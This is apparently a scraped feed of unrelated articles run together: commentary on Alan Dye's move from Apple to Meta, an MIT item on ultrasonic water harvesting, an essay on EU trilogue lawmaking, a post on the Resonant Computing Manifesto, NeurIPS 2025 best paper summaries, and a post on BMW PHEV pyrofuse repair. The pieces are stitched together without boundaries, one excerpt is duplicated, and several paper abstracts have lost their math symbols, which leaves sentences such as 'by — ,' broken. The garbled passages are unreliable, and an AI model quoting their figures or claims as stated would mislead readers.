Perhaps Cook now needs to define “us”.
This was a rather memorable interview. Cook’s “What would I do? I wouldn’t be in this situation” is one of the stone-coldest lines he’s ever zinged at a rival company. (In public, that is.) That was just ice cold. Cook is a consummate diplomat. Most non-founder big company CEOs are. Satya Nadella, Sundar Pichai, Andy Jassy — none of them are known for throwing shade, let alone sharp elbows, at competitors. Cook has made an exception,
multiple
times
, when it comes to Facebook/Meta (and to a lesser degree, Google).
So it’s not just that Alan Dye jumped ship from Apple for the chief designer officer role at another company.
1
It’s not just that he left for a
rival
company. It’s that he left Apple for
Meta
, of all companies. Given what Cook has said about Meta publicly, one can only imagine what he thinks about them privately. Apple executives tend to stay at Apple. The stability of its executive team is unparalleled. But Dye is a senior leader who not only left for a rival, but the one rival that Cook and the rest of Apple’s senior leadership team consider the most antithetical to Apple’s ideals.
It would have been surprising if Dye had jumped ship to Google or Microsoft. It would have been a little more surprising if he’d left for Amazon, if only because Amazon seemingly places no cultural value whatsoever on design, as Apple practices it. But maybe with Amazon it would have been seen as Andy Jassy deciding to get serious about design, and thus, in a way, less surprising after the fact. But leaving Apple for
Meta
, of all companies, feels shocking. How could someone who would even
consider
leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few
public faces of the company
?
So it’s not just that Alan Dye is a fraud of a UI designer and leader, and that Apple’s senior leadership had a blind spot to the ways Dye’s leadership was steering Apple’s interface design deeply astray. That’s problem enough, as I emphasized
in my piece yesterday
. It’s also that it’s now clear that Dye’s moral compass was not aligned with Apple’s either. Tim Cook and the rest — or at least most? — of Apple’s senior leadership apparently couldn’t see that, either.
Ultrasonic device dramatically speeds harvesting of water from the air
Feeling thirsty? Why not tap into the air? Even in desert conditions, there exists some level of humidity that, with the right material, can be soaked up and squeezed out to produce clean drinking water. In recent years, scientists have developed a host of promising sponge-like materials for this “atmospheric water harvesting.”
But recovering the water from these materials usually requires heat — and time. Existing designs rely on heat from the sun to evaporate water from the materials and condense it into droplets. But this step can take hours or even days.
Now, MIT engineers have come up with a way to quickly recover water from an atmospheric water harvesting material. Rather than wait for the sun to evaporate water out, the team uses ultrasonic waves to shake the water out.
The researchers have developed an ultrasonic device that vibrates at high frequency. When a water-harvesting material, known as a “sorbent,” is placed on the device, the device emits ultrasound waves that are tuned to shake water molecules out of the sorbent. The team found that the device recovers water in minutes, versus the tens of minutes or hours required by thermal designs.
Unlike heat-based designs, the device does require a power source. The team envisions that the device could be powered by a small solar cell, which could also act as a sensor to detect when the sorbent is full. It could also be programmed to automatically turn on whenever a material has harvested enough moisture to be extracted. In this way, a system could soak up and shake out water from the air over many cycles in a single day.
“People have been looking for ways to harvest water from the atmosphere, which could be a big source of water particularly for desert regions and places where there is not even saltwater to desalinate,” says Svetlana Boriskina, principal research scientist in MIT’s Department of Mechanical Engineering. “Now we have a way to recover water quickly and efficiently.”
Boriskina and her colleagues report on their new device in a study
appearing today in the journal
Nature Communications
. The study’s first author is Ikra Iftekhar Shuvo, an MIT graduate student in media arts and sciences, along with Carlos Díaz-Marín, Marvin Christen, Michael Lherbette, and Christopher Liem.
Precious hours
Boriskina’s group at MIT develops materials that interact with the environment in novel ways. Recently, her group explored atmospheric water harvesting (AWH), and ways that materials can be designed to efficiently absorb water from the air. The hope is that, if they can work reliably, AWH systems would be of most benefit to communities where traditional sources of drinking water — and even saltwater — are scarce.
Like other groups, Boriskina’s lab had generally assumed that an AWH system in the field would absorb moisture during the night, and then use the heat from the sun during the day to naturally evaporate the water and condense it for collection.
“Any material that’s very good at capturing water doesn’t want to part with that water,” Boriskina explains. “So you need to put a lot of energy and precious hours into pulling water out of the material.”
She realized there could be a faster way to recover water after Ikra Shuvo joined her group. Shuvo had been working with ultrasound for wearable medical device applications. When he and Boriskina considered ideas for new projects, they realized that ultrasound could be a way to speed up the recovery step in atmospheric water harvesting.
“It clicked: We have this big problem we’re trying to solve, and now Ikra seemed to have a tool that can be used to solve this problem,” Boriskina recalls.
Water dance
Ultrasound, or ultrasonic waves, are acoustic pressure waves that travel at frequencies of over 20 kilohertz (20,000 cycles per second). Such high-frequency waves are not visible or audible to humans. And, as the team found, ultrasound vibrates at just the right frequency to shake water out of a material.
“With ultrasound, we can precisely break the weak bonds between water molecules and the sites where they’re sitting,” Shuvo says. “It’s like the water is dancing with the waves, and this targeted disturbance creates momentum that releases the water molecules, and we can see them shake out in droplets.”
Shuvo and Boriskina designed a new ultrasonic actuator to recover water from an atmospheric water harvesting material. The heart of the device is a flat ceramic ring that vibrates when voltage is applied. This ring is surrounded by an outer ring that is studded with tiny nozzles. Water droplets that shake out of a material can drop through the nozzle and into collection vessels attached above and below the vibrating ring.
They tested the device on a previously designed atmospheric water harvesting material. Using quarter-sized samples of the material, the team first placed each sample in a humidity chamber, set to various humidity levels. Over time, the samples absorbed moisture and became saturated. The researchers then placed each sample on the ultrasonic actuator and powered it on to vibrate at ultrasonic frequencies. In all cases, the device was able to shake out enough water to dry out each sample in just a few minutes.
The researchers calculate that, compared to using heat from the sun, the ultrasonic design is 45 times more efficient at extracting water from the same material.
“The beauty of this device is that it’s completely complementary and can be an add-on to almost any sorbent material,” says Boriskina, who envisions a practical, household system might consist of a fast-absorbing material and an ultrasonic actuator, each about the size of a window. Once the material is saturated, the actuator would briefly turn on, powered by a solar cell, to shake out the water. The material would then be ready to harvest more water, in multiple cycles throughout a single day.
“It’s all about how much water you can extract per day,” she says. “With ultrasound, we can recover water quickly, and cycle again and again. That can add up to a lot per day.”
This work was supported, in part, by the MIT Abdul Latif Jameel Water and Food Systems Lab and the MIT-Israel Zuckerman STEM Fund.
This work was carried out in part by using MIT.nano and ISN facilities at MIT.
The central puzzle of the EU is its extraordinary productivity. Grand coalitions, like the government recently formed in Germany, typically produce paralysis. The EU’s governing coalition is even grander, spanning the center-right EPP, the Socialists, the Liberals, and often the Greens, yet between 2019 and 2024, the EU passed around 13,000 acts, about seven per day. The U.S. Congress, over the same period, produced roughly 3,500 pieces of legislation and 2,000 resolutions.
1
Not only is the coalition broad, but encompasses huge national and regional diversity. In Brussels, the Parliament has 705 members from roughly 200 national parties. The Council represents 27 sovereign governments with conflicting interests. A law faces a double hurdle, where a qualified majority of member states and of members of parliament must support it. The system should produce gridlock, more still than the paralysis commonly associated with the American federal government. Yet it works fast and produces a lot, both good and bad. The reason lies in the incentives: every actor in the system is rewarded for producing legislation, and not for exercising their vetoes.
Understanding the incentives
The Commission initiates legislation, but it has no reason to be reticent. It cannot make policy by announcing new spending commitments and investments, as the budget is tiny, around one percent of GDP, and what little money it has is mostly earmarked for agriculture (one-third) and regional aid (one-third). In Brussels, policy equals legislation. Unlike national civil servants and politicians, civil servants and politicians who work in Brussels have one main path to build a career: passing legislation.
Legislation is valuable to the Commission, as new laws expand Commission competences, create precedent, employ more staff, and justify larger budgets. The Commission, which is indirectly elected and faces little pressure from voters, has no institutional interest in concluding that EU action is unnecessary, that existing national rules suffice, or that a country already has a great solution and others should simply learn from it.
The
formal legislative process
was designed to work through public disagreement, with each institution’s amendments debated and voted on in open session. The Commission proposes the text. Parliament debates and amends it in public. The Council reviews it and can force changes. If they disagree, the text bounces back and forth. If the deadlock persists, a joint committee attempts to force a compromise before a final vote. Each stage requires a full majority. Contentious laws took years.
This slow process changed in stages. The Amsterdam Treaty (1999) allowed Parliament and Council to adopt laws at the First Reading if an agreement was reached early. Initially, this was exceptional, but by the 2008 financial crisis, speed became a priority. The Barroso Commission argued that EU survival required rapid response, and it deemed sequential public readings too slow.
The
trilogues
became the solution after a formal “declaration” in 2007, though the Treaties never mention them. Instead of public debate, representatives from the Parliament, Council, and Commission meet privately to agree on the text. They work from a “four-column document.” The first three columns list the starting positions of each institution, the fourth column contains the emerging law. The Commission acts as the “pen-holder” for this fourth column. This gives them immense power: by controlling the wording of the compromise, they can subtly exclude options they dislike.
Because these meetings are informal, they lack rules on duration or conduct. Negotiators often work in “marathon” sessions that stretch until dawn to force a deal. The final meeting for the AI Act, for instance, lasted
nearly 38 hours
. This physical exhaustion leads to drafting errors. Ministers and MEPs, desperate to finish, agree to complex details at 4:00 a.m. that they have not properly read. By the time the legislation reaches the chamber floor, the deal is done, errors and all.
2
Final agreement of the Trilogue for the Recovery and Reconstruction Facility (Regulation (EU) 2021/241). Early morning hours of December 18, 2020. Left-to-right: Garicano (Renew), Boeslager (Greens), van Overvelt (ECR), Muresan (EPP), Clauss (German Council Presidency), Dombrovskis (EU Commission), Tinagli (S&D), García (S&D), Pislaru (Renew).
The European Parliament is the institution that is accountable to the voters. But it is the parliamentary committees, and their ideology, that matter, not the plenary or the political parties to which MEPs belong. Those who join EMPL, which covers labor laws, want stronger social protections. Those who join ENVI want tougher climate rules.
The committee coordinator for each political group appoints one MEP to handle the legislative file: the
Rapporteur
for the lead group,
Shadow Rapporteurs
for the others. These five to seven people negotiate the law among themselves, nominally on behalf of their groups. In practice, no one outside the committee has any say.
When the negotiating team reaches an agreement (normally, a grand coalition of the centrist groups), they return to the full committee. The committee in turn usually backs the deal, given that the rapporteurs who made it represent a majority in the committee, and the committee self-selects based on ideology.
Crucially, the rapporteurs then present the deal to their political groups as inevitable, based on the tenuous majority of the centrist coalition that governs Europe. “This is the best compromise we can get,” the rapporteur invariably announces. “Any amendment will cause the EPP/Greens/S&D/Renew to drop the deal.”
Groups face pressure for a simple up-or-down vote, and often prefer to claim a deal than doing nothing. MEPs who refuse to support the deal may be branded as troublemakers and risk losing support on their own files in the future.
Often just a couple of weeks after the committee vote, the legislation reaches the full Parliament to obtain a mandate authorizing trilogue negotiations, with little time for the remaining MEPs to grasp what is happening.
The dynamic empowers a small committee majority to drive major policy change. For example, in May 2022, the ENVI committee (by just 6 votes) approved a mandate to cut by 100% CO₂ emissions from new cars by 2035. De facto, this bans new petrol and diesel cars from that date.
Less than four weeks later, in June 2022, Parliament rubber stamped that position as its official negotiating mandate, with a “Ferrari” exception for niche sports cars. This four weeks left almost no time to debate, consult national delegations, or reconsider the committee’s position. From that slim committee vote, the EU proceeded toward an historic shift to electric vehicles continent-wide.
Similarly, the EMPL committee approved, in November 2021, the Directive on Adequate Minimum Wages, even though Article 153(5) of the Treaty on the Functioning of the EU explicitly excludes “pay” from the EU’s social policy competences. Co-Rapporteurs Dennis Radtke (center-right EPP) and Agnes Jongerius (center-left S&D) formed a tight alliance and gained a majority in committee, sidelining fierce opposition from countries like Denmark and Sweden that wished to protect their national wage-bargaining systems.
The committee’s text was rushed to plenary and adopted as Parliament’s position fourteen days later (in late November). The system let a committee majority deliver a law the
Court of Justice ruled partially illegal
in November 2025 precisely at the request of the Nordic states, striking down Article 5(2) on criteria for setting minimum wages.
The player you’d expect to check any excesses is the Council of Ministers from the member states, which represents national governments. But the way the Council participates in the drafting dilutes this check. The Council is represented by the country holding the rotating Presidency, which changes every six months. Each Presidency comes in with a political agenda and a strong incentive to succeed during its short tenure. With a 13-year wait before that member state will hold it again, the Presidency is under pressure to close deals quickly, especially on its priority files, to claim credit. This can make the Council side surprisingly eager to compromise and wrap things up, even at the cost of making more concessions than some member states would ideally like.
The Commission presents itself as a neutral broker during the trilogue process. It is not. By controlling the wording of the draft agreement (“Column four”), the Commission can subtly exclude options misaligned with its preferences. It knows the dossiers inside out and can use its institutional memory to its advantage. Commission services analyze positions of key MEPs and Council delegations in advance, triangulating deals that preserve core objectives.
The Commission also exploits the six-month presidency rotation. Research shows it strategically delays proposals until a Member State with similar preferences takes over.
3
As the six-month Presidency clock winds down, the Council’s willingness to make concessions often increases. No country wants to hand off an unfinished file to the next country, if it can avoid it. The Commission, aware of this, often pushes for marathon trilogues right before deadlines or the end of a Presidency to extract the final compromises.
As legislation has grown more technical, elected officials have grown more reliant on their staff. Accredited Parliamentary Assistants (APAs) to MEPs, as well as political group advisers and Council attachés, play a large role. These staffers have become primary drafters of amendments and key negotiators representing their bosses in “technical trilogues”, where substantial political decisions are often disguised as technical adjustments.
4
COVID-19 accelerated this. Physical closure increased reliance on written exchanges and remote connections, favoring APAs and the permanent secretariats of Commission, Parliament, and Council. The pandemic created a “Zoom Parliament” where corridor conversations, crucial to coalition-building among MEPs, disappeared. In my experience, they did not fully return after the pandemic. This again greatly strengthened the hand of the Commission.
Quantity without quality
The result of this volume bias in the system is an onslaught of low-quality legislation. Compliance is often impossible. A BusinessEurope analysis cited by the
Draghi report
looked at just 13 pieces of EU legislation and found 169 cases where different laws impose requirements on the same issue. In almost a third of these overlaps, the detailed requirements were different, and in about one in ten they were outright contradictory.
Part of the problem is the lack of feedback loops and impact assessment at the aggregate level. The Commission’s Standard Cost Model for calculating regulatory burdens varies in application across files. Amendments introduced by Parliament or Council are never subject to cost-benefit analysis.
No single methodology assesses
EU legislation once transposed nationally. Only a few Member States systematically measure a transposed law’s impact. The EU has few institutionalized mechanisms to evaluate whether a given piece of legislation actually achieved its objectives. Instead, the Brussels machinery tends to simply move on to the next legislative project.
Brussels’ amazing productivity doesn’t make sense if you look at how the treaties are written, but it is obvious once you understand the informal incentives facing every
relevant
player in the process. Formally, the EU is a multi-actor system with many veto points (Commission, Parliament, Council, national governments, etc.), which should require broad agreement and hence slow decision making. In practice, consensus is manufactured in advance rather than reached through deliberation.
By the time any proposal comes up for an official vote, most alternatives have been eliminated behind closed doors. A small team of rapporteurs agrees among themselves; the committee endorses their bargain; the plenary, in turn, ratifies the committee deal; and the Council Presidency, pressed for time, accepts the compromise (with both Council and Parliament influenced along the way by the Commission’s mediation and drafting). Each actor can thus claim a victory and no one’s incentive is to apply the brakes.
This “trilogue system” has proven far more effective at expanding the scope of EU law than a truly pluralistic, many-veto-player system would be. In the EU’s political economy, every success and every failure leads to “more law,” and the system is finely tuned to deliver it.
The Resonant Computing Manifesto
Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.
This part in particular resonates with me:
For decades, technolo...
The Resonant Computing Manifesto
. Launched today at WIRED’s
The Big Interview
event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.
This part in particular resonates with me:
For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.
This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that
adaptively shapes itself
in service of our individual and collective aspirations.
The manifesto proposes five principles for building resonant software: Keeping data
private
and under personal stewardship, building software that's
dedicated
to the user's interests, ensuring
plural
and distributed control rather than platform monopolies, making tools
adaptable
to individual context, and designing for
prosocial
membership of shared spaces.
By 2025, it was clear to Komoroske and his cohort that Big Tech had strayed far from its early idealistic principles. As Silicon Valley began to align itself more strongly with political interests, the idea emerged within the group to lay out a different course, and a casual suggestion led to a process where some in the group began drafting what became today’s manifesto. They chose the word “resonant” to describe their vision mainly because of its positive connotations. As the document explains, “It’s the experience of encountering something that speaks to our deeper values.”
The Best Paper Award Committee members were nominated by the Program Chairs and the Database and Benchmark track chairs, who selected leading researchers across machine learning topics. These nominations were approved by the General Chairs and Next Generation and Accessibility Chairs.
The best paper award committees were tasked with selecting a handful of highly impactful papers from the Main Track and the Datasets & Benchmark Track of the conference.
With that, we are excited to share the news that the best and runner-up paper awards this year go to seven groundbreaking papers, including four best papers (one of which is from the datasets and benchmarks track) and three runner-ups. The seven papers highlight advances in diffusion model theory, self-supervised reinforcement learning, attention mechanisms for large language models, reasoning capabilities in LLMs, online learning theory, neural scaling laws, and benchmarking methodologies for language model diversity.
The winners are presented here in alphabetical order by title.
Large language models (LMs) often struggle to generate diverse, human-like creative content, raising concerns about the long-term homogenization of human thought through repeated exposure to similar outputs. Yet scalable methods for evaluating LM output diversity remain limited, especially beyond narrow tasks such as random number or name generation, or beyond repeated sampling from a single model. To address this gap, we introduce Infinity-Chat, a large-scale dataset of 26K diverse, real-world, open-ended user queries that admit a wide range of plausible answers with no single ground truth. We introduce the first comprehensive taxonomy for characterizing the full spectrum of open-ended prompts posed to LMs, comprising 6 top-level categories (e.g., creative content generation, brainstorm & ideation) that further breaks down to 17 subcategories. Using Infinity-Chat, we present a large-scale study of mode collapse in LMs, revealing a pronounced Artificial Hivemind effect in open-ended generation of LMs, characterized by (1) intra-model repetition, where a single model consistently generates similar responses, and more so (2) inter-model homogeneity, where different models produce strikingly similar outputs. Infinity-Chat also includes 31,250 human annotations, across absolute ratings and pairwise preferences, with 25 independent human annotations per example. This enables studying collective and individual-specific human preferences in response to open-ended queries. Our findings show that state-of-the-art LMs, reward models, and LM judges are less well calibrated to human ratings on model generations that elicit differing idiosyncratic annotator preferences, despite maintaining comparable overall quality. Overall, INFINITY-CHAT presents the first large-scale resource for systematically studying real-world open-ended queries to LMs, revealing critical insights to guide future research for mitigating long-term AI safety risks posed by the Artificial Hivemind.
Reflections from the Selection Committee
This paper makes a substantial and timely contribution to the understanding of diversity, pluralism, and societal impact in modern language models. The authors introduce Infinity-Chat, a rigorously constructed benchmark of 26K real-world open-ended queries paired with 31K dense human annotations, enabling systematic evaluation of creative generation, ideation, and subjective preference alignment, dimensions historically underexamined in AI evaluation. Beyond releasing a valuable dataset, the paper provides deep analytical insights through the first comprehensive taxonomy of open-ended prompts and an extensive empirical study across more than 70 models, revealing the Artificial Hivemind effect: pronounced intra- and inter-model homogenization that raises serious concerns about long-term risks to human creativity, value plurality, and independent thinking. The findings expose critical miscalibration between current reward models, automated judges, and diverse human preferences, highlighting the tension between alignment and diversity and establishing a foundation for future work on preserving heterogeneity in AI systems. Overall, this work sets a new standard for datasets and benchmarks that advance scientific understanding and address pressing societal challenges rather than solely improving technical performance.
Gating mechanisms have been widely utilized, from early models like LSTMs and Highway Networks to recent state space models, linear attention, and also softmax attention. Yet, existing literature rarely examines the specific effects of gating. In this work, we conduct comprehensive experiments to systematically investigate gating-augmented softmax attention variants. Specifically, we perform a comprehensive comparison over 30 variants of 15B Mixture-of-Experts (MoE) models and 1.7B dense models trained on a 3.5 trillion token dataset. Our central finding is that a simple modification—applying a head-specific sigmoid gate after the Scaled Dot-Product Attention (SDPA)—consistently improves performance. This modification also enhances training stability, tolerates larger learning rates, and improves scaling properties. By comparing various gating positions and computational variants, we attribute this effectiveness to two key factors: (1) introducing non-linearity upon the low-rank mapping in the softmax attention, and (2) applying query-dependent sparse gating scores to modulate the SDPA output. Notably, we find this sparse gating mechanism mitigates massive activation, attention sink and enhances long-context extrapolation performance. We also release related codes (
https://github.com/qiuzh20/gated_attention}
) and models (
https://huggingface.co/QwQZh/gated_attention
) to facilitate future research. Furthermore, the most effective SDPA output gating is used in the Qwen3-Next models (
https://huggingface.co/collections/Qwen/qwen3-next
).
Reflections from the Selection Committee
The main finding of this paper is that the performance of large language models using softmax attention can be consistently improved by introducing head-specific sigmoid gating after the scaled dot product attention operation in both dense and mixture-of-experts (MoE) Transformer models. This finding is backed up by more than thirty experiments on different variants of gated softmax attention using 15B MoE and 1.7B dense models trained on large-scale datasets of 400B, 1T, or 3.5T tokens. The paper also includes careful analyses showing that the introduction of the authors’ recommended form of gating improves the training stability of large language models, reduces the “attention sink” phenomenon that has been widely reported in attention models, and enhances the performance of context length extension. The main recommendation of the paper is easily implemented, and given the extensive evidence provided in the paper for this modification to LLM architecture, we expect this idea to be widely adopted. This paper represents a substantial amount of work that is possible only with access to industrial scale computing resources, and the authors’ sharing of the results of their work, which will advance the community’s understanding of attention in large language models, is highly commendable, especially in an environment where there has been a move away from open sharing of scientific results around LLMs.
Scaling up self-supervised learning has driven breakthroughs in language and vision, yet comparable progress has remained elusive in reinforcement learning (RL). In this paper, we study building blocks for self-supervised RL that unlock substantial improvements in scalability, with network depth serving as a critical factor. Whereas most RL papers in recent years have relied on shallow architectures (around 2 — 5 layers), we demonstrate that increasing the depth up to 1024 layers can significantly boost performance. Our experiments are conducted in an unsupervised goal-conditioned setting, where no demonstrations or rewards are provided, so an agent must explore (from scratch) and learn how to maximize the likelihood of reaching commanded goals. Evaluated on simulated locomotion and manipulation tasks, our approach increases performance on the self-supervised contrastive RL algorithm by — , outperforming other goal-conditioned baselines. Increasing the model depth not only increases success rates but also qualitatively changes the behaviors learned.
Reflections from the Selection Committee
This paper challenges the conventional assumption that the information provided by reinforcement learning (RL) is insufficient to effectively guide the numerous parameters of deep neural networks, hence suggesting that large AI systems be predominantly trained through self-supervision, with RL reserved solely for fine-tuning. The work introduces a novel and easy-to-implement RL paradigm for the effective training of very deep neural networks, employing self-supervised and contrastive RL. The accompanying analysis demonstrates that RL can scale efficiently with increasing network depth, leading to the emergence of more sophisticated capabilities. In addition to presenting compelling results, the study includes several useful analyses, for example, for highlighting the important role of batch size scaling for deeper networks within contrastive RL.
Diffusion models have achieved remarkable success across a wide range of generative tasks. A key challenge is understanding the mechanisms that prevent their memorization of training data and allow generalization. In this work, we investigate the role of the training dynamics in the transition from generalization to memorization. Through extensive experiments and theoretical analysis, we identify two distinct timescales: an early time at which models begin to generate high-quality samples, and a later time beyond which memorization emerges. Crucially, we find that increases linearly with the training set size , while remaining constant. This creates a growing window of training times where models generalize effectively, despite showing strong memorization if training continues beyond it. It is only when it becomes larger than a model-dependent threshold that overfitting disappears at infinite training times. These findings reveal a form of implicit dynamical regularization in the training dynamics, which allows to avoid memorization even in highly overparameterized settings. Our results are supported by numerical experiments with standard U-Net architectures on realistic and synthetic datasets, and by a theoretical analysis using a tractable random features model studied in the high-dimensional limit.
Reflections from the Selection Committee
This paper presents foundational work on the implicit regularization dynamics of diffusion models, delivering a powerful result by unifying empirical observation with formal theory. The critical finding is the quantitative identification of two distinct, predictable timescales, an early, dataset-independent generalization phase followed by a linear, dataset-size-dependent memorization phase . This demonstration of an expanding window for effective generalization is not merely an empirical finding but is rigorously explained by deriving the spectral properties of the random features model using random matrix theory. By linking the practical success of diffusion models directly to a provable dynamical property (the implicit postponement of overfitting), the paper provides fundamental, actionable insight into the mechanisms governing modern generative AI, setting a new standard for analytical depth in the study of generalization.
Reinforcement Learning with Verifiable Rewards (RLVR) has recently demonstrated notable success in enhancing the reasoning performance of large language models (LLMs), particularly in mathematics and programming tasks. It is widely believed that, similar to how traditional RL helps agents to explore and learn new strategies, RLVR enables LLMs to continuously self-improve, thus acquiring novel reasoning abilities that exceed the capacity of the corresponding base models. In this study, we take a critical look at \textit{the current state of RLVR} by systematically probing the reasoning capability boundaries of RLVR-trained LLMs across diverse model families, RL algorithms, and math/coding/visual reasoning benchmarks, using pass@\textit{k} at large \textit{k} values as the evaluation metric. While RLVR improves sampling efficiency towards the correct path, we surprisingly find that current training does \emph{not} elicit fundamentally new reasoning patterns. We observe that while RLVR-trained models outperform their base models at smaller values of (\eg, =1), base models achieve higher pass@ score when is large. Moreover, we observe that the reasoning capability boundary of LLMs often narrows as RLVR training progresses. Further coverage and perplexity analysis shows that the reasoning paths generated by RLVR models are already included in the base models’ sampling distribution, suggesting that their reasoning abilities originate from and are \textit{bounded} by the base model. From this perspective, treating the base model as an upper bound, our quantitative analysis shows that six popular RLVR algorithms perform similarly and remain far from optimal in fully leveraging the potential of the base model. In contrast, we find that distillation can introduce new reasoning patterns from the teacher and genuinely expand the model’s reasoning capabilities. Taken together, our findings suggest that current RLVR methods have not fully realized the potential of RL to elicit genuinely novel reasoning abilities in LLMs. This underscores the need for improved RL paradigms—such as continual scaling and multi-turn agent-environment interaction—to unlock this potential.
Reflections from the Selection Committee
This paper delivers a masterfully executed and critically important negative finding on a widely accepted, foundational assumption in Large Language Model (LLM) research: that Reinforcement Learning with Verifiable Rewards (RLVR) elicits genuinely new reasoning capabilities. The paper shows that RLVR training, across various model families, tasks, and algorithms, enhances sampling efficiency without expanding the reasoning capacity already present in base models. RL narrows exploration, rewarded trajectories are amplified, but the broader solution space shrinks, revealing that RLVR optimizes within, rather than beyond, the base distribution. This is an important finding which will hopefully incentivize fundamentally new RL paradigms able to navigate the vast action space and genuinely expand LLM reasoning capabilities.
We resolve a 30-year-old open problem concerning the power of unlabeled data in online learning by tightly quantifying the gap between transductive and standard online learning. We prove that for every concept class with Littlestone dimension , the transductive mistake bound is at least . This establishes an exponential improvement over previous lower bounds of , , and , respectively due to Ben-David, Kushilevitz, and Mansour (1995, 1997) and Hanneke, Moran, and Shafer (2023). We also show that our bound is tight: for every , there exists a class of Littlestone dimension with transductive mistake bound . Our upper bound also improves the previous best known upper bound from Ben-David et al. (1997). These results demonstrate a quadratic gap between transductive and standard online learning, thereby highlighting the benefit of advanced access to the unlabeled instance sequence. This stands in stark contrast to the PAC setting, where transductive and standard learning exhibit similar sample complexities.
Reflections from the Selection Committee
This paper presents a breakthrough in learning theory, deserving the NeurIPS Best Paper Runner-Up award for its elegant, comprehensive, and definitive resolution of a 30-year-old open problem. The authors have not only precisely quantified the optimal mistake bound for transductive online learning as Ω(√d), but they have also achieved a tight match with an O(√d) upper bound. This establishes a quadratic gap between transductive and standard online learning, a result that represents an exponential leap beyond all previous logarithmic lower bounds and dramatically highlights the theoretical value of unlabeled data in this setting—a crucial insight distinct from its more limited role in PAC learning.
The novelty and ingenuity of their proof techniques are quite remarkable. For the lower bound, the adversary employs a sophisticated strategy that balances forcing mistakes with carefully managing the shrinking of the version space, leveraging the concept of “paths in trees” as a fundamental underlying structure. The upper bound, demonstrating the learnability within O(√d) mistakes, introduces an innovative hypothesis class construction that embeds a “sparse encoding” for off-path nodes – a probabilistic design where most off-path labels are zero, but the rare ones carry immense information. The learner’s strategy to exploit this class is equally brilliant, integrating several non-standard sophisticated techniques: “Danger Zone Minimization” to control the instance sequence presented by the adversary, “Splitting Experts” via a multiplicative weights approach to handle uncertainty about a node’s on-path status, and a strategic “Transition to Halving” once sufficient information is gathered from the sparsely encoded off-path labels. This intricate interplay between a cleverly constructed hypothesis class and a highly adaptive learning algorithm showcases a masterclass in theoretical analysis and design.
The success of today’s large language models (LLMs) depends on the observation that larger models perform better. However, the origin of this neural scaling law, that loss decreases as a power law with model size, remains unclear. We propose that representation superposition, meaning that LLMs represent more features than they have dimensions, can be a key contributor to loss and cause neural scaling. Based on Anthropic’s toy model, we use weight decay to control the degree of superposition, allowing us to systematically study how loss scales with model size. When superposition is weak, the loss follows a power law only if data feature frequencies are power-law distributed. In contrast, under strong superposition, the loss generically scales inversely with model dimension across a broad class of frequency distributions, due to geometric overlaps between representation vectors. We confirmed that open-sourced LLMs operate in the strong superposition regime and have loss scaling inversely with model dimension, and that the Chinchilla scaling laws are also consistent with this behavior. Our results identify representation superposition as a central driver of neural scaling laws, providing insights into questions like when neural scaling laws can be improved and when they will break down.
Reflections from the Selection Committee:
This paper moves beyond observation of neural scaling laws—the empirically established phenomenon in which model loss exhibits a power-law decrease as model size, dataset size, or computational resources are increased—to demonstrate that representation superposition constitutes the primary mechanism governing these laws. Authors introduce a controlled “toy model” to examine how superposition and data structure affect the scaling of loss with model size and demonstrate that under strong superposition where features are overlapping, the loss scales consistently as an inverse power law with respect to the model dimension. The core findings are supported by a series of carefully designed experiments and offer fresh insights into an important research area.
The selection of these papers reflects the remarkable breadth of research presented at NeurIPS 2025, spanning generative modeling, reinforcement learning, natural language processing, learning theory, neural scaling, and benchmarking methodologies. The diversity of topics among the awarded papers demonstrates the vibrant and multifaceted nature of machine learning research.
We extend our congratulations to all the award recipients and look forward to seeing these works presented at the conference this December! Please note that the award certificates will be given out during the paper’s respective oral sessions by the session chairs.
We would also like to extend our gratitude and appreciation to the members of the Best Paper Award Committee listed here.
Best Paper Award Committee for Main Track and Database and Benchmark Tracks
Jacob Andreas (MIT, United States)
Sander Dieleman (Google DeepMind, UK)
Dilek Hakkani-Tur (University of Illinois Urbana-Champaign, United States)
Brian Kingsbury (IBM, United States)
Mirella Lapata (University of Edinburgh, Scotland)
Vincent Lepetit (Ecole des Ponts ParisTech, France)
Ulrich Paquet (AIMES & Google DeepMind, Africa)
Violet Peng (UCLA, United States)
Doina Precup (McGill University, Canada)
Masashi Sugiyama (RIKEN & University of Tokyo, Japan)
Vincent Tan (National University of Singapore, Singapore)
Yee Whye Teh (University of Oxford, United Kingdom)
Xing Xie (Microsoft, China)
Luke Zettlemoyer (University of Washington/Meta, United States)
BMW PHEV: When EU engineering becomes a synonym for "unrepairable" (EV Clinic)
2021 > PHEV BMW iBMUCP PHEV Post-Crash Recovery — When EU engineering becomes a synonym for “unrepairable” + “generating waste”.
If you own a BMW PHEV — or if you’re an insurance company — every pothole, every curb impact, and even every rabbit jumping out of a bush represents a potential €5,000 cost, just for a single fuse inside the high-voltage battery system.
This “safety fuse” is designed to shut the system down the moment any crash event is detected. Sounds safe — but extremely expensive. Theoraticaly insurance for BMW PHEV should be 3x higher than ICE or EV
Unfortunately, that’s not the only issue.
BMW has over-engineered the diagnostic procedure to such a level that even their own technicians often do not know the correct replacement process. And it gets worse: the original iBMUCP module, which integrates the pyrofuse, contactors, BMS and internal copper-bonded circuitry, is fully welded shut. There are no screws, no service openings, and it is not designed to be opened, even though the pyrofuse and contactors are technically replaceable components. Additionally, the procedure requires flashing the entire vehicle both before and after the replacement, which adds several hours to the process and increases risk of bricked components which can increase the recovery cost by factor 10x.
But that is still not the only problem.
Even after we managed to open the unit and access everything inside, we discovered that the Infineon TC375 MCU is fully locked. Both the D-Flash sectors and crash-flag areas are unreadable via DAP or via serial access.
Meaning: even if you replace the pyrofuse, you still cannot clear the crash flag, because the TC375 is cryptographically locked.
This leaves only one method:
➡️ Replace the entire iBMUCP module with a brand-new one. (1100€ + tax for faulty fuse)
And the registration of the new component is easily one of the worst procedures we have ever seen. You need an ICOM, IMIB, and AOS subscription — totalling over €25,000 in tools — just to replace a fuse. (even we managed to activate this one with IMIB, it will be necessary in some situation)
Yes, you read that correctly, 25,000€
